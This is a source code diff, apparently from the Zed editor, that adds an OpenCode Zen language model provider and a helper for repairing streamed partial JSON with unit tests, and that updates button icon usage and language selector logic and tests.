.label_size(LabelSize::Small)
- .icon(IconName::Undo)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Undo).size(IconSize::Small))
.layer(ElevationIndex::ModalSurface)
.when(env_var_set, |this| {
this.tooltip(Tooltip::text(format!("To reset your API key, unset the {env_var_name} environment variable.")))
@@ -21,7 +21,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*};
use ui_input::InputField;
use util::ResultExt;
-use crate::provider::util::parse_tool_arguments;
+use crate::provider::util::{fix_streamed_json, parse_tool_arguments};
const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("openrouter");
const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("OpenRouter");
@@ -657,7 +657,7 @@ impl OpenRouterEventMapper {
if !entry.id.is_empty() && !entry.name.is_empty() {
if let Ok(input) = serde_json::from_str::<serde_json::Value>(
- &partial_json_fixer::fix_json(&entry.arguments),
+ &fix_streamed_json(&entry.arguments),
) {
events.push(Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
@@ -0,0 +1,646 @@
+use anyhow::Result;
+use collections::BTreeMap;
+use futures::{FutureExt, StreamExt, future::BoxFuture};
+use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window};
+use http_client::HttpClient;
+use language_model::{
+ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError,
+ LanguageModelCompletionEvent, LanguageModelId, LanguageModelName, LanguageModelProvider,
+ LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState,
+ LanguageModelRequest, LanguageModelToolChoice, RateLimiter, Role, env_var,
+};
+use opencode::{ApiProtocol, OPENCODE_API_URL};
+pub use settings::OpenCodeAvailableModel as AvailableModel;
+use settings::{Settings, SettingsStore};
+use std::sync::{Arc, LazyLock};
+use strum::IntoEnumIterator;
+use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*};
+use ui_input::InputField;
+use util::ResultExt;
+
+use crate::provider::anthropic::{AnthropicEventMapper, into_anthropic};
+use crate::provider::google::{GoogleEventMapper, into_google};
+use crate::provider::open_ai::{
+ OpenAiEventMapper, OpenAiResponseEventMapper, into_open_ai, into_open_ai_response,
+};
+
+const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("opencode");
+const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("OpenCode Zen");
+
+const API_KEY_ENV_VAR_NAME: &str = "OPENCODE_API_KEY";
+static API_KEY_ENV_VAR: LazyLock<EnvVar> = env_var!(API_KEY_ENV_VAR_NAME);
+
+#[derive(Default, Clone, Debug, PartialEq)]
+pub struct OpenCodeSettings {
+ pub api_url: String,
+ pub available_models: Vec<AvailableModel>,
+}
+
+pub struct OpenCodeLanguageModelProvider {
+ http_client: Arc<dyn HttpClient>,
+ state: Entity<State>,
+}
+
+pub struct State {
+ api_key_state: ApiKeyState,
+}
+
+impl State {
+ fn is_authenticated(&self) -> bool {
+ self.api_key_state.has_key()
+ }
+
+ fn set_api_key(&mut self, api_key: Option<String>, cx: &mut Context<Self>) -> Task<Result<()>> {
+ let api_url = OpenCodeLanguageModelProvider::api_url(cx);
+ self.api_key_state
+ .store(api_url, api_key, |this| &mut this.api_key_state, cx)
+ }
+
+ fn authenticate(&mut self, cx: &mut Context<Self>) -> Task<Result<(), AuthenticateError>> {
+ let api_url = OpenCodeLanguageModelProvider::api_url(cx);
+ self.api_key_state
+ .load_if_needed(api_url, |this| &mut this.api_key_state, cx)
+ }
+}
+
+impl OpenCodeLanguageModelProvider {
+ pub fn new(http_client: Arc<dyn HttpClient>, cx: &mut App) -> Self {
+ let state = cx.new(|cx| {
+ cx.observe_global::<SettingsStore>(|this: &mut State, cx| {
+ let api_url = Self::api_url(cx);
+ this.api_key_state
+ .handle_url_change(api_url, |this| &mut this.api_key_state, cx);
+ cx.notify();
+ })
+ .detach();
+ State {
+ api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()),
+ }
+ });
+
+ Self { http_client, state }
+ }
+
+ fn create_language_model(&self, model: opencode::Model) -> Arc<dyn LanguageModel> {
+ Arc::new(OpenCodeLanguageModel {
+ id: LanguageModelId::from(model.id().to_string()),
+ model,
+ state: self.state.clone(),
+ http_client: self.http_client.clone(),
+ request_limiter: RateLimiter::new(4),
+ })
+ }
+
+ pub fn settings(cx: &App) -> &OpenCodeSettings {
+ &crate::AllLanguageModelSettings::get_global(cx).opencode
+ }
+
+ fn api_url(cx: &App) -> SharedString {
+ let api_url = &Self::settings(cx).api_url;
+ if api_url.is_empty() {
+ OPENCODE_API_URL.into()
+ } else {
+ SharedString::new(api_url.as_str())
+ }
+ }
+}
+
+impl LanguageModelProviderState for OpenCodeLanguageModelProvider {
+ type ObservableEntity = State;
+
+ fn observable_entity(&self) -> Option<Entity<Self::ObservableEntity>> {
+ Some(self.state.clone())
+ }
+}
+
+impl LanguageModelProvider for OpenCodeLanguageModelProvider {
+ fn id(&self) -> LanguageModelProviderId {
+ PROVIDER_ID
+ }
+
+ fn name(&self) -> LanguageModelProviderName {
+ PROVIDER_NAME
+ }
+
+ fn icon(&self) -> IconOrSvg {
+ IconOrSvg::Icon(IconName::AiOpenCode)
+ }
+
+ fn default_model(&self, _cx: &App) -> Option<Arc<dyn LanguageModel>> {
+ Some(self.create_language_model(opencode::Model::default()))
+ }
+
+ fn default_fast_model(&self, _cx: &App) -> Option<Arc<dyn LanguageModel>> {
+ Some(self.create_language_model(opencode::Model::default_fast()))
+ }
+
+ fn provided_models(&self, cx: &App) -> Vec<Arc<dyn LanguageModel>> {
+ let mut models = BTreeMap::default();
+
+ for model in opencode::Model::iter() {
+ if !matches!(model, opencode::Model::Custom { .. }) {
+ models.insert(model.id().to_string(), model);
+ }
+ }
+
+ for model in &Self::settings(cx).available_models {
+ let protocol = match model.protocol.as_str() {
+ "anthropic" => ApiProtocol::Anthropic,
+ "openai_responses" => ApiProtocol::OpenAiResponses,
+ "openai_chat" => ApiProtocol::OpenAiChat,
+ "google" => ApiProtocol::Google,
+ _ => ApiProtocol::OpenAiChat, // unrecognized protocol strings fall back to the OpenAI chat protocol
+ };
+ models.insert(
+ model.name.clone(),
+ opencode::Model::Custom {
+ name: model.name.clone(),
+ display_name: model.display_name.clone(),
+ max_tokens: model.max_tokens,
+ max_output_tokens: model.max_output_tokens,
+ protocol,
+ },
+ );
+ }
+
+ models
+ .into_values()
+ .map(|model| self.create_language_model(model))
+ .collect()
+ }
+
+ fn is_authenticated(&self, cx: &App) -> bool {
+ self.state.read(cx).is_authenticated()
+ }
+
+ fn authenticate(&self, cx: &mut App) -> Task<Result<(), AuthenticateError>> {
+ self.state.update(cx, |state, cx| state.authenticate(cx))
+ }
+
+ fn configuration_view(
+ &self,
+ _target_agent: language_model::ConfigurationViewTargetAgent,
+ window: &mut Window,
+ cx: &mut App,
+ ) -> AnyView {
+ cx.new(|cx| ConfigurationView::new(self.state.clone(), window, cx))
+ .into()
+ }
+
+ fn reset_credentials(&self, cx: &mut App) -> Task<Result<()>> {
+ self.state
+ .update(cx, |state, cx| state.set_api_key(None, cx))
+ }
+}
+
+pub struct OpenCodeLanguageModel {
+ id: LanguageModelId,
+ model: opencode::Model,
+ state: Entity<State>,
+ http_client: Arc<dyn HttpClient>,
+ request_limiter: RateLimiter,
+}
+
+impl OpenCodeLanguageModel {
+ /// Returns the base API URL (e.g., "https://opencode.ai/zen").
+ fn base_api_url(&self, cx: &AsyncApp) -> SharedString {
+ self.state
+ .read_with(cx, |_, cx| OpenCodeLanguageModelProvider::api_url(cx))
+ }
+
+ fn api_key(&self, cx: &AsyncApp) -> Option<Arc<str>> {
+ self.state.read_with(cx, |state, cx| {
+ let api_url = OpenCodeLanguageModelProvider::api_url(cx);
+ state.api_key_state.key(&api_url)
+ })
+ }
+
+ fn stream_anthropic(
+ &self,
+ request: anthropic::Request,
+ cx: &AsyncApp,
+ ) -> BoxFuture<
+ 'static,
+ Result<
+ futures::stream::BoxStream<
+ 'static,
+ Result<anthropic::Event, anthropic::AnthropicError>,
+ >,
+ LanguageModelCompletionError,
+ >,
+ > {
+ let http_client = self.http_client.clone();
+ // Anthropic crate appends /v1/messages to api_url
+ let api_url = self.base_api_url(cx);
+ let api_key = self.api_key(cx);
+
+ let future = self.request_limiter.stream(async move {
+ let Some(api_key) = api_key else {
+ return Err(LanguageModelCompletionError::NoApiKey {
+ provider: PROVIDER_NAME,
+ });
+ };
+ let request = anthropic::stream_completion(
+ http_client.as_ref(),
+ &api_url,
+ &api_key,
+ request,
+ None,
+ );
+ let response = request.await?;
+ Ok(response)
+ });
+
+ async move { Ok(future.await?.boxed()) }.boxed()
+ }
+
+ fn stream_openai_chat(
+ &self,
+ request: open_ai::Request,
+ cx: &AsyncApp,
+ ) -> BoxFuture<
+ 'static,
+ Result<futures::stream::BoxStream<'static, Result<open_ai::ResponseStreamEvent>>>,
+ > {
+ let http_client = self.http_client.clone();
+ // OpenAI crate appends /chat/completions to api_url, so we pass base + "/v1"
+ let base_url = self.base_api_url(cx);
+ let api_url: SharedString = format!("{base_url}/v1").into();
+ let api_key = self.api_key(cx);
+ let provider_name = PROVIDER_NAME.0.to_string();
+
+ let future = self.request_limiter.stream(async move {
+ let Some(api_key) = api_key else {
+ return Err(LanguageModelCompletionError::NoApiKey {
+ provider: PROVIDER_NAME,
+ });
+ };
+ let request = open_ai::stream_completion(
+ http_client.as_ref(),
+ &provider_name,
+ &api_url,
+ &api_key,
+ request,
+ );
+ let response = request.await?;
+ Ok(response)
+ });
+
+ async move { Ok(future.await?.boxed()) }.boxed()
+ }
+
+ fn stream_openai_response(
+ &self,
+ request: open_ai::responses::Request,
+ cx: &AsyncApp,
+ ) -> BoxFuture<
+ 'static,
+ Result<futures::stream::BoxStream<'static, Result<open_ai::responses::StreamEvent>>>,
+ > {
+ let http_client = self.http_client.clone();
+ // Responses crate appends /responses to api_url, so we pass base + "/v1"
+ let base_url = self.base_api_url(cx);
+ let api_url: SharedString = format!("{base_url}/v1").into();
+ let api_key = self.api_key(cx);
+ let provider_name = PROVIDER_NAME.0.to_string();
+
+ let future = self.request_limiter.stream(async move {
+ let Some(api_key) = api_key else {
+ return Err(LanguageModelCompletionError::NoApiKey {
+ provider: PROVIDER_NAME,
+ });
+ };
+ let request = open_ai::responses::stream_response(
+ http_client.as_ref(),
+ &provider_name,
+ &api_url,
+ &api_key,
+ request,
+ );
+ let response = request.await?;
+ Ok(response)
+ });
+
+ async move { Ok(future.await?.boxed()) }.boxed()
+ }
+
+ fn stream_google_zen(
+ &self,
+ request: google_ai::GenerateContentRequest,
+ cx: &AsyncApp,
+ ) -> BoxFuture<
+ 'static,
+ Result<futures::stream::BoxStream<'static, Result<google_ai::GenerateContentResponse>>>,
+ > {
+ let http_client = self.http_client.clone();
+ let api_url = self.base_api_url(cx);
+ let api_key = self.api_key(cx);
+
+ let future = self.request_limiter.stream(async move {
+ let Some(api_key) = api_key else {
+ return Err(LanguageModelCompletionError::NoApiKey {
+ provider: PROVIDER_NAME,
+ });
+ };
+ let request = opencode::stream_generate_content_zen(
+ http_client.as_ref(),
+ &api_url,
+ &api_key,
+ request,
+ );
+ let response = request.await?;
+ Ok(response)
+ });
+
+ async move { Ok(future.await?.boxed()) }.boxed()
+ }
+}
+
+impl LanguageModel for OpenCodeLanguageModel {
+ fn id(&self) -> LanguageModelId {
+ self.id.clone()
+ }
+
+ fn name(&self) -> LanguageModelName {
+ LanguageModelName::from(self.model.display_name().to_string())
+ }
+
+ fn provider_id(&self) -> LanguageModelProviderId {
+ PROVIDER_ID
+ }
+
+ fn provider_name(&self) -> LanguageModelProviderName {
+ PROVIDER_NAME
+ }
+
+ fn supports_tools(&self) -> bool {
+ self.model.supports_tools()
+ }
+
+ fn supports_images(&self) -> bool {
+ self.model.supports_images()
+ }
+
+ fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool {
+ match choice {
+ LanguageModelToolChoice::Auto | LanguageModelToolChoice::Any => true,
+ LanguageModelToolChoice::None => {
+ // Google models don't support None tool choice
+ self.model.protocol() != ApiProtocol::Google
+ }
+ }
+ }
+
+ fn telemetry_id(&self) -> String {
+ format!("opencode/{}", self.model.id())
+ }
+
+ fn max_token_count(&self) -> u64 {
+ self.model.max_token_count()
+ }
+
+ fn max_output_tokens(&self) -> Option<u64> {
+ self.model.max_output_tokens()
+ }
+
+ fn count_tokens(
+ &self,
+ request: LanguageModelRequest,
+ cx: &App,
+ ) -> BoxFuture<'static, Result<u64>> {
+ cx.background_spawn(async move {
+ let messages = request
+ .messages
+ .into_iter()
+ .map(|message| tiktoken_rs::ChatCompletionRequestMessage {
+ role: match message.role {
+ Role::User => "user".into(),
+ Role::Assistant => "assistant".into(),
+ Role::System => "system".into(),
+ },
+ content: Some(message.string_contents()),
+ name: None,
+ function_call: None,
+ })
+ .collect::<Vec<_>>();
+
+ tiktoken_rs::num_tokens_from_messages("gpt-4o", &messages).map(|tokens| tokens as u64)
+ })
+ .boxed()
+ }
+
+ fn stream_completion(
+ &self,
+ request: LanguageModelRequest,
+ cx: &AsyncApp,
+ ) -> BoxFuture<
+ 'static,
+ Result<
+ futures::stream::BoxStream<
+ 'static,
+ Result<LanguageModelCompletionEvent, LanguageModelCompletionError>,
+ >,
+ LanguageModelCompletionError,
+ >,
+ > {
+ match self.model.protocol() {
+ ApiProtocol::Anthropic => {
+ let anthropic_request = into_anthropic(
+ request,
+ self.model.id().to_string(),
+ 1.0,
+ self.model.max_output_tokens().unwrap_or(8192),
+ anthropic::AnthropicModelMode::Default,
+ );
+ let stream = self.stream_anthropic(anthropic_request, cx);
+ async move {
+ let mapper = AnthropicEventMapper::new();
+ Ok(mapper.map_stream(stream.await?).boxed())
+ }
+ .boxed()
+ }
+ ApiProtocol::OpenAiChat => {
+ let openai_request = into_open_ai(
+ request,
+ self.model.id(),
+ false,
+ false,
+ self.model.max_output_tokens(),
+ None,
+ );
+ let stream = self.stream_openai_chat(openai_request, cx);
+ async move {
+ let mapper = OpenAiEventMapper::new();
+ Ok(mapper.map_stream(stream.await?).boxed())
+ }
+ .boxed()
+ }
+ ApiProtocol::OpenAiResponses => {
+ let response_request = into_open_ai_response(
+ request,
+ self.model.id(),
+ false,
+ false,
+ self.model.max_output_tokens(),
+ None,
+ );
+ let stream = self.stream_openai_response(response_request, cx);
+ async move {
+ let mapper = OpenAiResponseEventMapper::new();
+ Ok(mapper.map_stream(stream.await?).boxed())
+ }
+ .boxed()
+ }
+ ApiProtocol::Google => {
+ let google_request = into_google(
+ request,
+ self.model.id().to_string(),
+ google_ai::GoogleModelMode::Default,
+ );
+ let stream = self.stream_google_zen(google_request, cx);
+ async move {
+ let mapper = GoogleEventMapper::new();
+ Ok(mapper.map_stream(stream.await?.boxed()).boxed())
+ }
+ .boxed()
+ }
+ }
+ }
+}
+
+struct ConfigurationView {
+ api_key_editor: Entity<InputField>,
+ state: Entity<State>,
+ load_credentials_task: Option<Task<()>>,
+}
+
+impl ConfigurationView {
+ fn new(state: Entity<State>, window: &mut Window, cx: &mut Context<Self>) -> Self {
+ let api_key_editor = cx.new(|cx| {
+ InputField::new(window, cx, "sk-00000000000000000000000000000000").label("API key")
+ });
+
+ cx.observe(&state, |_, _, cx| {
+ cx.notify();
+ })
+ .detach();
+
+ let load_credentials_task = Some(cx.spawn_in(window, {
+ let state = state.clone();
+ async move |this, cx| {
+ if let Some(task) = Some(state.update(cx, |state, cx| state.authenticate(cx))) {
+ let _ = task.await;
+ }
+ this.update(cx, |this, cx| {
+ this.load_credentials_task = None;
+ cx.notify();
+ })
+ .log_err();
+ }
+ }));
+
+ Self {
+ api_key_editor,
+ state,
+ load_credentials_task,
+ }
+ }
+
+ fn save_api_key(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context<Self>) {
+ let api_key = self.api_key_editor.read(cx).text(cx).trim().to_string();
+ if api_key.is_empty() {
+ return;
+ }
+
+ self.api_key_editor
+ .update(cx, |editor, cx| editor.set_text("", window, cx));
+
+ let state = self.state.clone();
+ cx.spawn_in(window, async move |_, cx| {
+ state
+ .update(cx, |state, cx| state.set_api_key(Some(api_key), cx))
+ .await
+ })
+ .detach_and_log_err(cx);
+ }
+
+ fn reset_api_key(&mut self, window: &mut Window, cx: &mut Context<Self>) {
+ self.api_key_editor
+ .update(cx, |editor, cx| editor.set_text("", window, cx));
+
+ let state = self.state.clone();
+ cx.spawn_in(window, async move |_, cx| {
+ state
+ .update(cx, |state, cx| state.set_api_key(None, cx))
+ .await
+ })
+ .detach_and_log_err(cx);
+ }
+
+ fn should_render_editor(&self, cx: &mut Context<Self>) -> bool {
+ !self.state.read(cx).is_authenticated()
+ }
+}
+
+impl Render for ConfigurationView {
+ fn render(&mut self, _: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
+ let env_var_set = self.state.read(cx).api_key_state.is_from_env_var();
+ let configured_card_label = if env_var_set {
+ format!("API key set in {API_KEY_ENV_VAR_NAME} environment variable")
+ } else {
+ let api_url = OpenCodeLanguageModelProvider::api_url(cx);
+ if api_url == OPENCODE_API_URL {
+ "API key configured".to_string()
+ } else {
+ format!("API key configured for {}", api_url)
+ }
+ };
+
+ let api_key_section = if self.should_render_editor(cx) {
+ v_flex()
+ .on_action(cx.listener(Self::save_api_key))
+ .child(Label::new(
+ "To use OpenCode Zen models in Zed, you need an API key:",
+ ))
+ .child(
+ List::new()
+ .child(
+ ListBulletItem::new("")
+ .child(Label::new("Sign in and get your key at"))
+ .child(ButtonLink::new(
+ "OpenCode Zen Console",
+ "https://opencode.ai/zen",
+ )),
+ )
+ .child(ListBulletItem::new(
+ "Paste your API key below and hit enter to start using OpenCode Zen",
+ )),
+ )
+ .child(self.api_key_editor.clone())
+ .child(
+ Label::new(format!(
+ "You can also set the {API_KEY_ENV_VAR_NAME} environment variable and restart Zed."
+ ))
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ .into_any_element()
+ } else {
+ ConfiguredApiCard::new(configured_card_label)
+ .disabled(env_var_set)
+ .when(env_var_set, |this| {
+ this.tooltip_label(format!(
+ "To reset your API key, unset the {API_KEY_ENV_VAR_NAME} environment variable."
+ ))
+ })
+ .on_click(cx.listener(|this, _, window, cx| this.reset_api_key(window, cx)))
+ .into_any_element()
+ };
+
+ if self.load_credentials_task.is_some() {
+ div().child(Label::new("Loading credentials...")).into_any()
+ } else {
+ v_flex().size_full().child(api_key_section).into_any()
+ }
+ }
+}
@@ -11,3 +11,99 @@ pub fn parse_tool_arguments(arguments: &str) -> Result<serde_json::Value, serde_
serde_json::Value::from_str(arguments)
}
}
+
+/// `partial_json_fixer::fix_json` converts a trailing `\` inside a string into `\\`
+/// (a literal backslash). When used for incremental parsing (comparing successive
+/// parses to extract deltas), this produces a spurious backslash character that
+/// doesn't exist in the final text, corrupting the output.
+///
+/// This function strips any trailing incomplete escape sequence before fixing,
+/// so each intermediate parse produces a true prefix of the final string value.
+pub fn fix_streamed_json(partial_json: &str) -> String {
+ let json = strip_trailing_incomplete_escape(partial_json);
+ partial_json_fixer::fix_json(json)
+}
+
+fn strip_trailing_incomplete_escape(json: &str) -> &str {
+ let trailing_backslashes = json
+ .as_bytes()
+ .iter()
+ .rev()
+ .take_while(|&&b| b == b'\\')
+ .count();
+ if trailing_backslashes % 2 == 1 {
+ &json[..json.len() - 1]
+ } else {
+ json
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn test_fix_streamed_json_strips_incomplete_escape() {
+ // Trailing `\` inside a string — incomplete escape sequence
+ let fixed = fix_streamed_json(r#"{"text": "hello\"#);
+ let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json");
+ assert_eq!(parsed["text"], "hello");
+ }
+
+ #[test]
+ fn test_fix_streamed_json_preserves_complete_escape() {
+ // `\\` is a complete escape (literal backslash)
+ let fixed = fix_streamed_json(r#"{"text": "hello\\"#);
+ let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json");
+ assert_eq!(parsed["text"], "hello\\");
+ }
+
+ #[test]
+ fn test_fix_streamed_json_strips_escape_after_complete_escape() {
+ // `\\\` = complete `\\` (literal backslash) + incomplete `\`
+ let fixed = fix_streamed_json(r#"{"text": "hello\\\"#);
+ let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json");
+ assert_eq!(parsed["text"], "hello\\");
+ }
+
+ #[test]
+ fn test_fix_streamed_json_no_escape_at_end() {
+ let fixed = fix_streamed_json(r#"{"text": "hello"#);
+ let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json");
+ assert_eq!(parsed["text"], "hello");
+ }
+
+ #[test]
+ fn test_fix_streamed_json_newline_escape_boundary() {
+ // Simulates a stream boundary landing between `\` and `n`
+ let fixed = fix_streamed_json(r#"{"text": "line1\"#);
+ let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json");
+ assert_eq!(parsed["text"], "line1");
+
+ // Next chunk completes the escape
+ let fixed = fix_streamed_json(r#"{"text": "line1\nline2"#);
+ let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json");
+ assert_eq!(parsed["text"], "line1\nline2");
+ }
+
+ #[test]
+ fn test_fix_streamed_json_incremental_delta_correctness() {
+ // This is the actual scenario that causes the bug:
+ // chunk 1 ends mid-escape, chunk 2 completes it.
+ let chunk1 = r#"{"replacement_text": "fn foo() {\"#;
+ let fixed1 = fix_streamed_json(chunk1);
+ let parsed1: serde_json::Value = serde_json::from_str(&fixed1).expect("valid json");
+ let text1 = parsed1["replacement_text"].as_str().expect("string");
+ assert_eq!(text1, "fn foo() {");
+
+ let chunk2 = r#"{"replacement_text": "fn foo() {\n return bar;\n}"}"#;
+ let fixed2 = fix_streamed_json(chunk2);
+ let parsed2: serde_json::Value = serde_json::from_str(&fixed2).expect("valid json");
+ let text2 = parsed2["replacement_text"].as_str().expect("string");
+ assert_eq!(text2, "fn foo() {\n return bar;\n}");
+
+ // The delta should be the newline + rest, with no spurious backslash
+ let delta = &text2[text1.len()..];
+ assert_eq!(delta, "\n return bar;\n}");
+ }
+}
@@ -288,6 +288,10 @@ impl LanguageModel for XAiLanguageModel {
self.model.max_output_tokens()
}
+ fn supports_split_token_display(&self) -> bool {
+ true
+ }
+
fn count_tokens(
&self,
request: LanguageModelRequest,
@@ -8,7 +8,8 @@ use crate::provider::{
deepseek::DeepSeekSettings, google::GoogleSettings, lmstudio::LmStudioSettings,
mistral::MistralSettings, ollama::OllamaSettings, open_ai::OpenAiSettings,
open_ai_compatible::OpenAiCompatibleSettings, open_router::OpenRouterSettings,
- vercel::VercelSettings, vercel_ai_gateway::VercelAiGatewaySettings, x_ai::XAiSettings,
+ opencode::OpenCodeSettings, vercel::VercelSettings, vercel_ai_gateway::VercelAiGatewaySettings,
+ x_ai::XAiSettings,
};
#[derive(Debug, RegisterSetting)]
@@ -20,6 +21,7 @@ pub struct AllLanguageModelSettings {
pub lmstudio: LmStudioSettings,
pub mistral: MistralSettings,
pub ollama: OllamaSettings,
+ pub opencode: OpenCodeSettings,
pub open_router: OpenRouterSettings,
pub openai: OpenAiSettings,
pub openai_compatible: HashMap<Arc<str>, OpenAiCompatibleSettings>,
@@ -41,6 +43,7 @@ impl settings::Settings for AllLanguageModelSettings {
let lmstudio = language_models.lmstudio.unwrap();
let mistral = language_models.mistral.unwrap();
let ollama = language_models.ollama.unwrap();
+ let opencode = language_models.opencode.unwrap();
let open_router = language_models.open_router.unwrap();
let openai = language_models.openai.unwrap();
let openai_compatible = language_models.openai_compatible.unwrap();
@@ -85,6 +88,10 @@ impl settings::Settings for AllLanguageModelSettings {
available_models: ollama.available_models.unwrap_or_default(),
context_window: ollama.context_window,
},
+ opencode: OpenCodeSettings {
+ api_url: opencode.api_url.unwrap(),
+ available_models: opencode.available_models.unwrap_or_default(),
+ },
open_router: OpenRouterSettings {
api_url: open_router.api_url.unwrap(),
available_models: open_router.available_models.unwrap_or_default(),
@@ -23,7 +23,7 @@ impl BasedPyrightBanner {
this.have_basedpyright = true;
}
});
- let dismissed = Self::dismissed();
+ let dismissed = Self::dismissed(cx);
Self {
dismissed,
have_basedpyright: false,
@@ -56,10 +56,8 @@ impl Render for BasedPyrightBanner {
.gap_0p5()
.child(
Button::new("learn-more", "Learn More")
- .icon(IconName::ArrowUpRight)
.label_size(LabelSize::Small)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::XSmall).color(Color::Muted))
.on_click(|_, _, cx| {
cx.open_url("https://zed.dev/docs/languages/python")
}),
@@ -280,20 +280,28 @@ impl PickerDelegate for LanguageSelectorDelegate {
};
this.update_in(cx, |this, window, cx| {
- let delegate = &mut this.delegate;
- delegate.matches = matches;
- delegate.selected_index = delegate
- .selected_index
- .min(delegate.matches.len().saturating_sub(1));
-
- if query_is_empty {
- if let Some(index) = delegate
- .current_language_candidate_index
- .and_then(|ci| delegate.matches.iter().position(|m| m.candidate_id == ci))
- {
- this.set_selected_index(index, None, false, window, cx);
- }
+ if matches.is_empty() {
+ this.delegate.matches = matches;
+ this.delegate.selected_index = 0;
+ cx.notify();
+ return;
}
+
+ let selected_index = if query_is_empty {
+ this.delegate
+ .current_language_candidate_index
+ .and_then(|current_language_candidate_index| {
+ matches.iter().position(|mat| {
+ mat.candidate_id == current_language_candidate_index
+ })
+ })
+ .unwrap_or(0)
+ } else {
+ 0
+ };
+
+ this.delegate.matches = matches;
+ this.set_selected_index(selected_index, None, false, window, cx);
cx.notify();
})
.log_err();
@@ -345,28 +353,25 @@ mod tests {
fn register_test_languages(project: &Entity<Project>, cx: &mut VisualTestContext) {
project.read_with(cx, |project, _| {
let language_registry = project.languages();
- language_registry.add(Arc::new(Language::new(
- LanguageConfig {
- name: "Rust".into(),
- matcher: LanguageMatcher {
- path_suffixes: vec!["rs".to_string()],
- ..Default::default()
- },
- ..Default::default()
- },
- None,
- )));
- language_registry.add(Arc::new(Language::new(
- LanguageConfig {
- name: "TypeScript".into(),
- matcher: LanguageMatcher {
- path_suffixes: vec!["ts".to_string()],
+ for (language_name, path_suffix) in [
+ ("C", "c"),
+ ("Go", "go"),
+ ("Ruby", "rb"),
+ ("Rust", "rs"),
+ ("TypeScript", "ts"),
+ ] {
+ language_registry.add(Arc::new(Language::new(
+ LanguageConfig {
+ name: language_name.into(),
+ matcher: LanguageMatcher {
+ path_suffixes: vec![path_suffix.to_string()],
+ ..Default::default()
+ },
..Default::default()
},
- ..Default::default()
- },
- None,
- )));
+ None,
+ )));
+ }
});
}
@@ -406,6 +411,24 @@ mod tests {
workspace: &Entity<Workspace>,
project: &Entity<Project>,
cx: &mut VisualTestContext,
+ ) -> Entity<Editor> {
+ let editor = open_new_buffer_editor(workspace, project, cx).await;
+ // Ensure the buffer has no language after the editor is created
+ let (_, buffer, _) = editor.read_with(cx, |editor, cx| {
+ editor
+ .active_excerpt(cx)
+ .expect("editor should have an active excerpt")
+ });
+ buffer.update(cx, |buffer, cx| {
+ buffer.set_language(None, cx);
+ });
+ editor
+ }
+
+ async fn open_new_buffer_editor(
+ workspace: &Entity<Workspace>,
+ project: &Entity<Project>,
+ cx: &mut VisualTestContext,
) -> Entity<Editor> {
let create_buffer = project.update(cx, |project, cx| project.create_buffer(None, true, cx));
let buffer = create_buffer.await.expect("empty buffer should be created");
@@ -415,10 +438,6 @@ mod tests {
workspace.update_in(cx, |workspace, window, cx| {
workspace.add_item_to_center(Box::new(editor.clone()), window, cx);
});
- // Ensure the buffer has no language after the editor is created
- buffer.update(cx, |buffer, cx| {
- buffer.set_language(None, cx);
- });
editor
}
@@ -559,15 +578,86 @@ mod tests {
assert_selected_language_for_editor(&workspace, &rust_editor, Some("Rust"), cx);
assert_selected_language_for_editor(&workspace, &typescript_editor, Some("TypeScript"), cx);
- // Ensure the empty editor's buffer has no language before asserting
- let (_, buffer, _) = empty_editor.read_with(cx, |editor, cx| {
- editor
- .active_excerpt(cx)
- .expect("editor should have an active excerpt")
+ assert_selected_language_for_editor(&workspace, &empty_editor, None, cx);
+ }
+
+ #[gpui::test]
+ async fn test_language_selector_selects_first_match_after_querying_new_buffer(
+ cx: &mut TestAppContext,
+ ) {
+ let app_state = init_test(cx);
+ app_state
+ .fs
+ .as_fake()
+ .insert_tree(path!("/test"), json!({}))
+ .await;
+
+ let project = Project::test(app_state.fs.clone(), [path!("/test").as_ref()], cx).await;
+ let (multi_workspace, cx) =
+ cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace =
+ multi_workspace.read_with(cx, |multi_workspace, _| multi_workspace.workspace().clone());
+ register_test_languages(&project, cx);
+
+ let editor = open_new_buffer_editor(&workspace, &project, cx).await;
+ workspace.update_in(cx, |workspace, window, cx| {
+ let was_activated = workspace.activate_item(&editor, true, true, window, cx);
+ assert!(
+ was_activated,
+ "editor should be activated before opening the modal"
+ );
});
- buffer.update(cx, |buffer, cx| {
- buffer.set_language(None, cx);
+ cx.run_until_parked();
+
+ let picker = open_selector(&workspace, cx);
+ picker.read_with(cx, |picker, _| {
+ let selected_match = picker
+ .delegate
+ .matches
+ .get(picker.delegate.selected_index)
+ .expect("selected index should point to a match");
+ let selected_candidate = picker
+ .delegate
+ .candidates
+ .get(selected_match.candidate_id)
+ .expect("selected match should map to a candidate");
+
+ assert_eq!(selected_candidate.string, "Plain Text");
+ assert!(
+ picker
+ .delegate
+ .current_language_candidate_index
+ .is_some_and(|current_language_candidate_index| {
+ current_language_candidate_index > 1
+ }),
+ "test setup should place Plain Text after at least two earlier languages",
+ );
+ });
+
